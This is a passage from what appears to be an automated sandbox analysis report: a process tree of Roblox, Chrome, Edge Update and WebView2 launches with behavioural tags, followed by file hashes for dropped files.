                                                                                          "C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe" -app -isInstallerLaunch
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          • Loads dropped DLL
                                                                                          • Suspicious use of NtCreateThreadExHideFromDebugger
                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of UnmapMainImage
                                                                                          PID:596
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5664 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:8
                                                                                        2⤵
                                                                                          PID:1124
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5764 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:2
                                                                                          2⤵
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          PID:3932
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=4872 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:1
                                                                                          2⤵
                                                                                            PID:3004
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=5188 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:1
                                                                                            2⤵
                                                                                              PID:3804
                                                                                          • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                                                                                            1⤵
                                                                                              PID:1052
                                                                                            • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
                                                                                              "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
                                                                                              1⤵
                                                                                              • Executes dropped EXE
                                                                                              • Loads dropped DLL
                                                                                              • Checks system information in the registry
                                                                                              • Modifies data under HKEY_USERS
                                                                                              PID:2780
                                                                                              • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
                                                                                                "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                • Checks system information in the registry
                                                                                                • Drops file in System32 directory
                                                                                                • Modifies data under HKEY_USERS
                                                                                                PID:1740
                                                                                              • C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2F3EA1EF-293F-4D06-A261-24DBCB2800DB}\MicrosoftEdge_X64_126.0.2592.68.exe
                                                                                                "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2F3EA1EF-293F-4D06-A261-24DBCB2800DB}\MicrosoftEdge_X64_126.0.2592.68.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:872
                                                                                                • C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2F3EA1EF-293F-4D06-A261-24DBCB2800DB}\EDGEMITMP_8BFBE.tmp\setup.exe
                                                                                                  "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2F3EA1EF-293F-4D06-A261-24DBCB2800DB}\EDGEMITMP_8BFBE.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2F3EA1EF-293F-4D06-A261-24DBCB2800DB}\MicrosoftEdge_X64_126.0.2592.68.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level
                                                                                                  3⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Drops file in Program Files directory
                                                                                                  PID:2272
                                                                                                  • C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2F3EA1EF-293F-4D06-A261-24DBCB2800DB}\EDGEMITMP_8BFBE.tmp\setup.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2F3EA1EF-293F-4D06-A261-24DBCB2800DB}\EDGEMITMP_8BFBE.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\MsEdgeCrashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=126.0.6478.114 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2F3EA1EF-293F-4D06-A261-24DBCB2800DB}\EDGEMITMP_8BFBE.tmp\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=126.0.2592.68 --initial-client-data=0x210,0x214,0x218,0x1ec,0x21c,0x7ff78bb9aa40,0x7ff78bb9aa4c,0x7ff78bb9aa58
                                                                                                    4⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:4720
                                                                                              • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
                                                                                                "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                • Checks system information in the registry
                                                                                                • Drops file in System32 directory
                                                                                                • Modifies data under HKEY_USERS
                                                                                                PID:1316
                                                                                            • C:\Windows\system32\taskmgr.exe
                                                                                              "C:\Windows\system32\taskmgr.exe" /0
                                                                                              1⤵
                                                                                              • Drops file in Windows directory
                                                                                              • Checks SCSI registry key(s)
                                                                                              • Checks processor information in registry
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              PID:580
                                                                                            • C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe
                                                                                              "C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe"
                                                                                              1⤵
                                                                                              • Executes dropped EXE
                                                                                              • Loads dropped DLL
                                                                                              • Suspicious use of NtCreateThreadExHideFromDebugger
                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                              • Suspicious use of UnmapMainImage
                                                                                              PID:592
                                                                                            • C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe
                                                                                              "C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe"
                                                                                              1⤵
                                                                                              • Executes dropped EXE
                                                                                              • Loads dropped DLL
                                                                                              • Suspicious use of NtCreateThreadExHideFromDebugger
                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                              • Suspicious use of UnmapMainImage
                                                                                              PID:4844
                                                                                            • C:\Windows\system32\SystemPropertiesRemote.exe
                                                                                              "C:\Windows\system32\SystemPropertiesRemote.exe"
                                                                                              1⤵
                                                                                                PID:1732
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                "C:\Windows\system32\cmd.exe"
                                                                                                1⤵
                                                                                                  PID:2052
                                                                                                • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
                                                                                                  "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ua /installsource scheduler
                                                                                                  1⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Loads dropped DLL
                                                                                                  PID:4756
                                                                                                • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
                                                                                                  "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
                                                                                                  1⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Loads dropped DLL
                                                                                                  • Checks system information in the registry
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  PID:2464
                                                                                                  • C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{B03F6FE8-253D-4C99-BADE-CFBCA90582C0}\MicrosoftEdgeUpdateSetup_X86_1.3.187.41.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{B03F6FE8-253D-4C99-BADE-CFBCA90582C0}\MicrosoftEdgeUpdateSetup_X86_1.3.187.41.exe" /update /sessionid "{681D8A3C-184C-4883-8C7D-55AA3487F1EC}"
                                                                                                    2⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:1512
                                                                                                    • C:\Program Files (x86)\Microsoft\Temp\EUAE89.tmp\MicrosoftEdgeUpdate.exe
                                                                                                      "C:\Program Files (x86)\Microsoft\Temp\EUAE89.tmp\MicrosoftEdgeUpdate.exe" /update /sessionid "{681D8A3C-184C-4883-8C7D-55AA3487F1EC}"
                                                                                                      3⤵
                                                                                                      • Event Triggered Execution: Image File Execution Options Injection
                                                                                                      • Executes dropped EXE
                                                                                                      • Loads dropped DLL
                                                                                                      • Checks system information in the registry
                                                                                                      PID:3776
                                                                                                      • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
                                                                                                        "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regsvc
                                                                                                        4⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:4424
                                                                                                      • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
                                                                                                        "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regserver
                                                                                                        4⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Loads dropped DLL
                                                                                                        • Modifies registry class
                                                                                                        PID:520
                                                                                                        • C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.41\MicrosoftEdgeUpdateComRegisterShell64.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.41\MicrosoftEdgeUpdateComRegisterShell64.exe"
                                                                                                          5⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Loads dropped DLL
                                                                                                          • Modifies registry class
                                                                                                          PID:1308
                                                                                                        • C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.41\MicrosoftEdgeUpdateComRegisterShell64.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.41\MicrosoftEdgeUpdateComRegisterShell64.exe"
                                                                                                          5⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Loads dropped DLL
                                                                                                          • Modifies registry class
                                                                                                          PID:3120
                                                                                                        • C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.41\MicrosoftEdgeUpdateComRegisterShell64.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.41\MicrosoftEdgeUpdateComRegisterShell64.exe"
                                                                                                          5⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Loads dropped DLL
                                                                                                          • Modifies registry class
                                                                                                          PID:872
                                                                                                      • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
                                                                                                        "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping 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-PGV4cCBldGFnPSImcXVvdDtyNDUydDErazJUZ3EvSFh6anZGTkJSaG9wQldSOXNialh4cWVVREg5dVgwPSZxdW90OyIvPjxhcHAgYXBwaWQ9IntGM0M0RkUwMC1FRkQ1LTQwM0ItOTU2OS0zOThBMjBGMUJBNEF9IiB2ZXJzaW9uPSIxLjMuMTcxLjM5IiBuZXh0dmVyc2lvbj0iMS4zLjE4Ny40MSIgbGFuZz0iIiBicmFuZD0iR0dMUyIgY2xpZW50PSIiIGluc3RhbGxhZ2U9IjAiIGluc3RhbGxkYXRlPSI2Mzg0IiBpbnN0YWxsZGF0ZXRpbWU9IjE3MTk0NDUwNDciPjxldmVudCBldmVudHR5cGU9IjMiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjEwMTA1Mzg4Mzg3Ii8-PC9hcHA-PC9yZXF1ZXN0Pg
                                                                                                        4⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Checks system information in the registry
                                                                                                        • Drops file in System32 directory
                                                                                                        • Modifies data under HKEY_USERS
                                                                                                        PID:3524
                                                                                                  • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNzEuMzkiIHNoZWxsX3ZlcnNpb249IjEuMy4xNzEuMzkiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7NjgxRDhBM0MtMTg0Qy00ODgzLThDN0QtNTVBQTM0ODdGMUVDfSIgaW5zdGFsbHNvdXJjZT0ic2NoZWR1bGVyIiByZXF1ZXN0aWQ9IntFMTQxMzIwQi1CMDNGLTRGRjEtQUE5MS00OUFENzMzQjIxMzF9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE1MDYzLjAiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iUUVNVSIgcHJvZHVjdF9uYW1lPSJTdGFuZGFyZCBQQyAoUTM1ICsgSUNIOSwgMjAwOSkiLz48ZXhwIGV0YWc9IiZxdW90O3I0NTJ0MStrMlRncS9IWHpqdkZOQlJob3BCV1I5c2JqWHhxZVVESDl1WDA9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0ie0YzQzRGRTAwLUVGRDUtNDAzQi05NTY5LTM5OEEyMEYxQkE0QX0iIHZlcnNpb249IjEuMy4xNzEuMzkiIG5leHR2ZXJzaW9uPSIxLjMuMTg3LjQxIiBsYW5nPSIiIGJyYW5kPSJHR0xTIiBjbGllbnQ9IiIgZXhwZXJpbWVudHM9ImNvbnNlbnQ9ZmFsc2UiIGluc3RhbGxhZ2U9IjAiPjx1cGRhdGVjaGVjay8-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-PHVwZGF0ZWNoZWNrLz48cGluZyByPSItMSIgcmQ9Ii0xIiBwaW5nX2ZyZXNobmVzcz0iezMwQjIyMjgwLTMzRjQtNEY0Ny1CM0E1LTZGMTI0NjdBMTRENX0iLz48L2FwcD48L3JlcXVlc3Q-
                                                                                                    2⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Checks system information in the registry
                                                                                                    • Drops file in System32 directory
                                                                                                    • Modifies data under HKEY_USERS
                                                                                                    PID:1732
                                                                                                • C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe
                                                                                                  "C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe"
                                                                                                  1⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Loads dropped DLL
                                                                                                  • Suspicious use of NtCreateThreadExHideFromDebugger
                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                  • Suspicious use of UnmapMainImage
                                                                                                  PID:4508
                                                                                                • C:\Program Files (x86)\Roblox\Versions\RobloxStudioInstaller.exe
                                                                                                  "C:\Program Files (x86)\Roblox\Versions\RobloxStudioInstaller.exe"
                                                                                                  1⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Enumerates system info in registry
                                                                                                  PID:2732
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe -relaunch
                                                                                                    2⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Checks whether UAC is enabled
                                                                                                    • Drops file in Program Files directory
                                                                                                    • Enumerates system info in registry
                                                                                                    • Modifies Internet Explorer settings
                                                                                                    PID:3876
                                                                                                    • C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\RobloxStudioBeta.exe
                                                                                                      "C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\RobloxStudioBeta.exe" -startEvent www.roblox.com/robloxQTStudioStartedEvent -firstLaunch
                                                                                                      3⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Loads dropped DLL
                                                                                                      • Checks whether UAC is enabled
                                                                                                      • Enumerates system info in registry
                                                                                                      • Suspicious behavior: AddClipboardFormatListener
                                                                                                      • Suspicious behavior: GetForegroundWindowSpam
                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                      PID:2372
                                                                                                      • C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\RobloxCrashHandler.exe
                                                                                                        "C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\RobloxCrashHandler.exe" --no-rate-limit --crashCounter Win-ROBLOXStudio-Crash --baseUrl https://www.roblox.com --attachment=attachment_0.630.0.6300556_20240626T234409Z_Studio_6ED98_last.log=C:\Users\Admin\AppData\Local\Roblox\logs\0.630.0.6300556_20240626T234409Z_Studio_6ED98_last.log --attachment=attachment_log_0.630.0.6300556_20240626T234409Z_Studio_6ED98_csg3.log=C:\Users\Admin\AppData\Local\Roblox\logs\log_0.630.0.6300556_20240626T234409Z_Studio_6ED98_csg3.log --database=C:\Users\Admin\AppData\Local\Roblox\logs\crashes --metrics-dir=C:\Users\Admin\AppData\Local\Roblox\logs\crashes --url=https://upload.crashes.rbxinfra.com/post?format=minidump --annotation=AppVersion=0.630.0.6300556 --annotation=Format=minidump --annotation=HardwareModel= --annotation=HasBootstrapper=true --annotation=InstallFolder=ProgramFilesX86 --annotation=OSPlatform=Windows --annotation=RobloxChannel=production --annotation=RobloxGitHash=ad847d7f5168ecfb2a8f42c2d912f9c436294a66 --annotation=RobloxProduct=RobloxStudio --annotation=StudioVersion=0.630.0.6300556 --annotation=UniqueId=557177522507117585 --annotation=UseCrashpad=True --annotation=app_arch=x86_64 --annotation=application.version=0.630.0.6300556 --annotation=host_arch=x86_64 --initial-client-data=0x4e0,0x4e4,0x4e8,0x42c,0x504,0x7ff7e74d3720,0x7ff7e74d3738,0x7ff7e74d3750
                                                                                                        4⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Loads dropped DLL
                                                                                                        PID:4036
                                                                                                      • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe
                                                                                                        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe" --embedded-browser-webview=1 --webview-exe-name=RobloxStudioBeta.exe --webview-exe-version="0, 630, 0, 6300556" --user-data-dir="C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView" --noerrdialogs --embedded-browser-webview-dpi-awareness=2 --enable-features=MojoIpcz --mojo-named-platform-channel-pipe=2372.3620.6969348788263939955
                                                                                                        4⤵
                                                                                                        • Checks computer location settings
                                                                                                        • Executes dropped EXE
                                                                                                        • Loads dropped DLL
                                                                                                        • Enumerates system info in registry
                                                                                                        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                        • System policy modification
                                                                                                        PID:2764
                                                                                                        • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView\Crashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=126.0.6478.114 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe" --annotation=plat=Win64 "--annotation=prod=Edge WebView2" --annotation=ver=126.0.2592.68 --initial-client-data=0x11c,0x120,0x124,0x104,0x12c,0x7ffdcb9c0148,0x7ffdcb9c0154,0x7ffdcb9c0160
                                                                                                          5⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Loads dropped DLL
                                                                                                          PID:1432
                                                                                                        • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe" --type=gpu-process --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView" --webview-exe-name=RobloxStudioBeta.exe --webview-exe-version="0, 630, 0, 6300556" --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1676,i,1243969546081703958,13549805308638243399,262144 --enable-features=MojoIpcz --variations-seed-version --mojo-platform-channel-handle=1668 /prefetch:2
                                                                                                          5⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Loads dropped DLL
                                                                                                          PID:4024
                                                                                                        • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView" --webview-exe-name=RobloxStudioBeta.exe --webview-exe-version="0, 630, 0, 6300556" --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --field-trial-handle=1620,i,1243969546081703958,13549805308638243399,262144 --enable-features=MojoIpcz --variations-seed-version --mojo-platform-channel-handle=1780 /prefetch:3
                                                                                                          5⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Loads dropped DLL
                                                                                                          PID:3348
                                                                                                        • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView" --webview-exe-name=RobloxStudioBeta.exe --webview-exe-version="0, 630, 0, 6300556" --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --field-trial-handle=1180,i,1243969546081703958,13549805308638243399,262144 --enable-features=MojoIpcz --variations-seed-version --mojo-platform-channel-handle=1972 /prefetch:8
                                                                                                          5⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Loads dropped DLL
                                                                                                          PID:2560
                                                                                                        • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView" --webview-exe-name=RobloxStudioBeta.exe --webview-exe-version="0, 630, 0, 6300556" --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc --ms-user-locale=" --field-trial-handle=3220,i,1243969546081703958,13549805308638243399,262144 --enable-features=MojoIpcz --variations-seed-version --mojo-platform-channel-handle=3236 /prefetch:1
                                                                                                          5⤵
                                                                                                          • Checks computer location settings
                                                                                                          • Executes dropped EXE
                                                                                                          • Loads dropped DLL
                                                                                                          PID:5336
                                                                                                        • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView" --webview-exe-name=RobloxStudioBeta.exe --webview-exe-version="0, 630, 0, 6300556" --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc --ms-user-locale=" --field-trial-handle=3808,i,1243969546081703958,13549805308638243399,262144 --enable-features=MojoIpcz --variations-seed-version --mojo-platform-channel-handle=3816 /prefetch:1
                                                                                                          5⤵
                                                                                                          • Checks computer location settings
                                                                                                          • Executes dropped EXE
                                                                                                          PID:5740
                                                                                                        • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView" --webview-exe-name=RobloxStudioBeta.exe --webview-exe-version="0, 630, 0, 6300556" --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc --ms-user-locale=" --field-trial-handle=3232,i,1243969546081703958,13549805308638243399,262144 --enable-features=MojoIpcz --variations-seed-version --mojo-platform-channel-handle=3628 /prefetch:1
                                                                                                          5⤵
                                                                                                          • Checks computer location settings
                                                                                                          • Executes dropped EXE
                                                                                                          PID:5964
                                                                                                • C:\Windows\System32\GameBarPresenceWriter.exe
                                                                                                  "C:\Windows\System32\GameBarPresenceWriter.exe" -ServerName:Windows.Gaming.GameBar.Internal.PresenceWriterServer
                                                                                                  1⤵
                                                                                                    PID:2308
                                                                                                  • C:\Windows\System32\GamePanel.exe
                                                                                                    "C:\Windows\System32\GamePanel.exe" 00000000000B02B8 /startuptips
                                                                                                    1⤵
                                                                                                    • Checks SCSI registry key(s)
                                                                                                    PID:5072
                                                                                                  • C:\Windows\System32\bcastdvr.exe
                                                                                                    "C:\Windows\System32\bcastdvr.exe" -ServerName:Windows.Media.Capture.Internal.BroadcastDVRServer
                                                                                                    1⤵
                                                                                                    • Drops desktop.ini file(s)
                                                                                                    PID:2716

                                                                                                  Network

                                                                                                  MITRE ATT&CK Enterprise v15

                                                                                                  Downloads


                                                                                                    4f99afa3819597289aa922c0f5dc39de

                                                                                                    SHA1

                                                                                                    98638a9110b95647f985cb5a0a29f2cead5d3938

                                                                                                    SHA256

                                                                                                    edefd6e18bc495e1d9ce613d368baede1e1f9bda26d1a340a43ad0bd9845a6cc

                                                                                                    SHA512

                                                                                                    2cd6cbbd44d1673c5959f47bae4f30144bd48ceb11374c11d477e7d250fa5e67747fa929194423d3da6fd73a9fd13b2fe103cf9357b0d96d341b64ea0faf1923

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                                                                                    Filesize

                                                                                                    3KB

                                                                                                    MD5

                                                                                                    afac87b14b40d374fd0efd1b609d2ee4

                                                                                                    SHA1

                                                                                                    16a9ae4024cf822988c2853bbe0c5269f2bb91ff

                                                                                                    SHA256

                                                                                                    856b854bb7693c605f441f5f928b8c966817cda477e6fdab8df7eaca2dbe7421

                                                                                                    SHA512

                                                                                                    f9d589f660f81ac98735862f46c09bc63095025ab7de7af624442e297be2b2c34bd5357eac92a63c7add2509a1be45802be02f1209aab4d009e709b4ac84613a

